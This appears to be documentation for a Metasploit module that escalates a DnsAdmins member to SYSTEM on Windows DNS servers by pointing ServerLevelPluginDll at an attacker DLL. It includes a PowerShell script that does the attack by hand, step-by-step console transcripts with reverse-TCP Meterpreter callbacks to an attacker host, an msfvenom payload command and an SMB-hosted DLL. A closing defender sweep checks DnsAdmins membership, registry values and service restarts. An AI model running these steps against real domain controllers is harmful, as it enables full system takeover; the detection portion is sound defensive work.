Introduction
This module exploits a feature of the DNS service on Windows Server. Members of the DnsAdmins group are
permitted to configure the DNS server through its management interface (for example with dnscmd.exe),
and that configuration includes the ServerLevelPluginDll value under
HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\. The value is the path of a plug-in DLL and can be
made to point to an arbitrary DLL. Restarting the DNS service will then result in the attacker's DLL
being loaded and executed in the context of the service, which runs as SYSTEM, thereby granting the attacker SYSTEM privileges.
Note that there is a slight possibility that antivirus may pick up on the DLL file which is dropped on
the system for this exploit to work. If the DLL is removed after ServerLevelPluginDll has been set, the DNS
service will fail to start because the configured plug-in DLL no longer exists, so it will not be possible
to restart it via the Service Manager. To resolve this, users must first delete the ServerLevelPluginDll value
under the HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ key using an administrator
account, after which they will be able to start the DNS service once again.
To avoid this occurring, this module has a configurable option, AVTIMEOUT,
which sets how long the module waits for any AV to pick up on the dropped file. After that
delay the module checks that the dropped DLL still exists before it creates the
ServerLevelPluginDll value within the
HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ key.
Users wishing to use this module with a UNC path, so that the DLL is loaded onto the target from an SMB share, are recommended to increase the value of WfsDelay to prevent potential timeouts.
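The same sequence done by hand in PowerShell, as an added example rather than code from the module or its documentation. It covers the mechanism above (set the value as a DnsAdmins member, restart the service), the AVTIMEOUT-style check, and the recovery path for a quarantined DLL. It assumes it runs on the DNS server itself, that dnscmd.exe is present, and that the current user may restart the DNS service; `$DllPath` and `$AvTimeoutSeconds` are placeholders standing in for the module's DLLPATH/DLLNAME and AVTIMEOUT options.

```powershell
# Added example; not part of the Metasploit module. Runs on the DNS server.
$regKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Test-DnsAdminsMembership {
    # Membership is read from the current access token, which is what the
    # DNS server evaluates; a user just added to DnsAdmins needs a fresh
    # logon before the group appears here.
    $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    foreach ($sid in $identity.Groups) {
        try { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { continue }
        if ($name -match '\\DnsAdmins$') { return $true }
    }
    return $false
}

function Set-DnsServerPluginDll {
    param(
        [Parameter(Mandatory)][string]$DllPath,   # local path or UNC path (assumed placeholder)
        [int]$AvTimeoutSeconds = 20               # plays the role of the module's AVTIMEOUT
    )
    if (-not (Test-DnsAdminsMembership)) { throw 'Current user is not a member of DnsAdmins' }

    # Give endpoint protection time to react to the dropped file, then confirm
    # it is still there before pointing the service at it. Pointing DNS at a
    # DLL that no longer exists leaves the service unable to start.
    Start-Sleep -Seconds $AvTimeoutSeconds
    if (-not (Test-Path -LiteralPath $DllPath)) {
        throw "DLL no longer present at $DllPath; not modifying ServerLevelPluginDll"
    }

    # dnscmd sends the configuration change to the DNS server over its
    # management interface; the server writes the value under HKLM itself,
    # which is why DnsAdmins membership rather than local admin rights is what matters.
    & dnscmd.exe /config /serverlevelplugindll $DllPath
    if ($LASTEXITCODE -ne 0) { throw "dnscmd failed with exit code $LASTEXITCODE" }

    # The DLL is only loaded when the service (re)starts; this needs the
    # stop/start right on the DNS service, which is assumed here.
    Restart-Service -Name DNS -Force
}

function Remove-DnsServerPluginDll {
    # Recovery described in the Introduction: once the DLL is gone (e.g.
    # quarantined), the service will not start until the value is removed.
    # This edits HKLM directly, so it needs an administrator, not just DnsAdmins.
    Remove-ItemProperty -LiteralPath $regKey -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
    Stop-Service -Name DNS -Force -ErrorAction SilentlyContinue
    Start-Service -Name DNS
}

# Usage (placeholder path): set the plug-in, then remove it again once done,
# which is the same cleanup the module performs after the session opens.
# Set-DnsServerPluginDll -DllPath 'C:\Windows\Temp\plugin.dll' -AvTimeoutSeconds 20
# Remove-DnsServerPluginDll
```

Leave the ServerLevelPluginDll value in place only for as long as needed; as the module does, remove it and restart the service afterwards so the server is not left depending on a file that may later be deleted.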
Vulnerable Application
Windows Server 2003 and above
Verification Steps
- Get a Meterpreter shell
- `use exploit/windows/local/dnsadmin_serverlevelplugindll`
- `set PAYLOAD <payload>`. Payload architecture must be the same as the target system
- `set LHOST <lhost>`
- `set LPORT <lport>`
- `set SESSION <session_no>` to specify session
- `set DLLNAME <dllname>` if you want to name your DLL something other than `msf.dll`
- `set DLLPATH <dllpath>` if you want to place your DLL somewhere other than `%TEMP%` or if you want to use a UNC path
- `set MAKEDLL true` if you want to just make the DLL, and not carry out the exploit
- `exploit` to get a SYSTEM shell if `MAKEDLL` is set to `false`, or to write the DLL to the `~/.msf4/local` folder if `MAKEDLL` is set to `true`
Options
DLLNAME
Name of the DLL to use.
DLLPATH
Location of the DLL to use. If a UNC path is provided, the module will assume that the operator has already performed the following actions:
- Set up a working SMB2 share (via a tool such as Impacket's smbserver.py)
- Created a DLL of the same architecture as the target system and placed it within this share.
MAKEDLL
If set to true, then just create the DLL, do not conduct the full exploit.
The resulting DLL will be stored in the ~/.msf4/local directory.
AVTIMEOUT
Time, in seconds, to wait for any AV on the target system to potentially pick up on the dropped DLL file, prior to the module checking to see if the DLL file still exists. This is needed to prevent a scenario where the DLL file gets removed and the module nonetheless sets ServerLevelPluginDll to the now-missing path, which would leave the DNS server unable to start.
Scenarios
Windows Server 2019 Standard x64, writing msf.dll to %TEMP%
msf5 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows BASILISKCORP\salazar.slytherin @ DC01 192.168.137.139:4444 -> 192.168.137.133:56312 (192.168.137.133)
msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.139
LHOST => 192.168.137.139
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set VERBOSE true
VERBOSE => true
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
[*] Started reverse TCP handler on 192.168.137.139:4444
[+] OS seems vulnerable.
[*] Running check against DC01 as user BASILISKCORP\salazar.slytherin...
[+] DNS service found on DC01.
[+] User BASILISKCORP\salazar.slytherin is part of the DnsAdmins group.
[*] DnsAdmins SID is S-1-5-21-2123406164-4007834289-1418149283-1101
[*] Checking service state...
[*] Building DLL...
[*] Writing DLL to C:\Users\SALAZA~1.SLY\AppData\Local\Temp\msf.dll...
[*] Modifying ServerLevelPluginDll to point to C:\Users\SALAZA~1.SLY\AppData\Local\Temp\msf.dll...
[+] Registry property serverlevelplugindll successfully reset.
[*] Restarting the DNS service...
[*] Sending stage (206403 bytes) to 192.168.137.133
[*] Meterpreter session 2 opened (192.168.137.139:4444 -> 192.168.137.133:56319) at 2020-05-16 01:41:53 +0800
meterpreter >
[*] Erasing ServerLevelPluginDll registry value...restarting.
Computer : DC01
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : BASILISKCORP
Logged On Users : 16
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Windows Server 2019 Standard x64, specifying a UNC path for ServerLevelPluginDll
The fastest way to get a share up and running is to use Impacket's smbserver:
msfdev2@automata-ng:~$ mkdir ~/test; sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -ip 192.168.137.139 test ~/test
[sudo] password for msfdev2:
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
You can generate a DLL using the module by setting MAKEDLL to true:
msf5 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows BASILISKCORP\salazar.slytherin @ DC01 192.168.137.139:4444 -> 192.168.137.133:56307 (192.168.137.133)
msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.139
LHOST => 192.168.137.139
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
DLLNAME => test.dll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL true
MAKEDLL => true
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
[*] Started reverse TCP handler on 192.168.137.139:4444
[*] Building DLL...
[+] test.dll stored at /home/msfdev2/.msf4/local/test.dll
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) >
Once the DLL has been generated, copy it to the folder shared by Impacket's smbserver:
msfdev2@automata-ng:~$ cp /home/msfdev2/.msf4/local/test.dll ~/test/test.dll
msfdev2@automata-ng:~$
Alternatively, you can generate a DLL using msfvenom, but note that a plain msfvenom DLL lacks the exports the DNS server expects from a plug-in DLL and will crash the service (see Notes):
msfdev2@automata-ng:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.137.139 LPORT=4444 -f dll -o ~/test/test.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 5120 bytes
Saved as: /home/msfdev2/test/test.dll
msfdev2@automata-ng:~$
After that, proceed with the actual exploit:
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL false
MAKEDLL => false
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLPATH \\\\192.168.137.139\\test
DLLPATH => \\192.168.137.139\test
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
DLLNAME => test.dll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set VERBOSE true
VERBOSE => true
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
[*] Started reverse TCP handler on 192.168.137.139:4444
[+] OS seems vulnerable.
[*] Running check against DC01 as user BASILISKCORP\salazar.slytherin...
[+] DNS service found on DC01.
[+] User BASILISKCORP\salazar.slytherin is part of the DnsAdmins group.
[*] DnsAdmins SID is S-1-5-21-2123406164-4007834289-1418149283-1101
[*] Checking service state...
[*] Using user-provided UNC path.
[*] Modifying ServerLevelPluginDll to point to \\192.168.137.139\test\test.dll...
[+] Registry property serverlevelplugindll successfully reset.
[*] Restarting the DNS service...
[*] Sending stage (206403 bytes) to 192.168.137.133
[*] Meterpreter session 2 opened (192.168.137.139:4444 -> 192.168.137.133:56493) at 2020-05-16 03:45:09 +0800
meterpreter > sysinfo
Computer : DC01
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : BASILISKCORP
Logged On Users : 18
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Windows Server 2019 Standard x64, just creating DLL
msf5 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows BASILISKCORP\salazar.slytherin @ DC01 192.168.137.139:4444 -> 192.168.137.133:56478 (192.168.137.133)
msf5 > use exploit/windows/local/dnsadmin_serverlevelplugindll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LHOST 192.168.137.139
LHOST => 192.168.137.139
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set MAKEDLL true
MAKEDLL => true
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > set DLLNAME test.dll
DLLNAME => test.dll
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) > exploit
[*] Started reverse TCP handler on 192.168.137.139:4444
[*] Building DLL...
[+] test.dll stored at /home/msfdev2/.msf4/local/test.dll
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/dnsadmin_serverlevelplugindll) >
Notes
- This module is not particularly opsec-safe: it drops a DLL to disk, writes to the registry, and is sure to generate a large number of event log entries when the DNS service is stopped and restarted.
- The service will crash if the DLL used does not contain the exports the DNS server expects from a plug-in DLL, so using an msfvenom-generated DLL will definitely cause it to crash.
- Automatic cleanup of the dropped DLL is attempted if the DLL has been written to disk, but if automatic cleanup fails manual cleanup may be necessary.
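A defender-side sweep for the artifacts listed in these notes, as an added example that is not part of the module or its documentation. It assumes it runs as an administrator on the DNS server (typically a domain controller) with the ActiveDirectory PowerShell module available; the Sysmon query applies only where Sysmon is deployed with registry monitoring covering the DNS Parameters key, and the event IDs used (Service Control Manager 7036 for service state changes, Sysmon 13 for registry value writes) are standard Windows/Sysmon IDs rather than anything this page states.

```powershell
# Added example; not part of the Metasploit module. Run as an administrator on the DNS server.
$regKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Get-DnsAdminsMembers {
    # Everyone listed here can reach the code path this module uses, so the
    # list should be short and reviewed; nested groups are expanded.
    Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
        Select-Object -ExpandProperty SamAccountName
}

function Test-DnsServerPluginDll {
    # Any configured value is worth a look on a server where no plug-in is
    # expected; a UNC path or a path outside System32 more so. A configured
    # path that no longer exists is the "AV removed the DLL" failure mode.
    $value = (Get-ItemProperty -Path $regKey -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
    if (-not $value) { return $null }
    [pscustomobject]@{
        Path       = $value
        IsUnc      = $value -like '\\*'
        InSystem32 = $value -like "$env:SystemRoot\System32\*"
        Exists     = Test-Path -LiteralPath $value
    }
}

function Get-DnsServiceRestarts {
    param([int]$Hours = 24)
    # Service Control Manager event 7036 records every state change of a
    # service; a stop/start pair for "DNS Server" outside a maintenance
    # window is the restart this module is sure to generate.
    Get-WinEvent -FilterHashtable @{
        LogName      = 'System'
        ProviderName = 'Service Control Manager'
        Id           = 7036
        StartTime    = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -like '*DNS Server*' } |
        Select-Object TimeCreated, Message
}

function Get-PluginDllRegistryWrites {
    param([int]$Hours = 24)
    # Sysmon event 13 (RegistryEvent: value set) on ServerLevelPluginDll.
    # Because the change is submitted through the DNS management interface,
    # expect the writing image to be the DNS server process rather than the
    # operator's shell; correlate with the logon session active at the time.
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 13
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -like '*\Services\DNS\Parameters\ServerLevelPluginDll*' } |
        Select-Object TimeCreated, Message
}

Get-DnsAdminsMembers
Test-DnsServerPluginDll
Get-DnsServiceRestarts
Get-PluginDllRegistryWrites
```

Run the sweep periodically or from an incident playbook; a non-empty result from Test-DnsServerPluginDll on a server that should have no plug-in is the single highest-value check, since the value persists after the attacker's session is gone unless the cleanup described above succeeded.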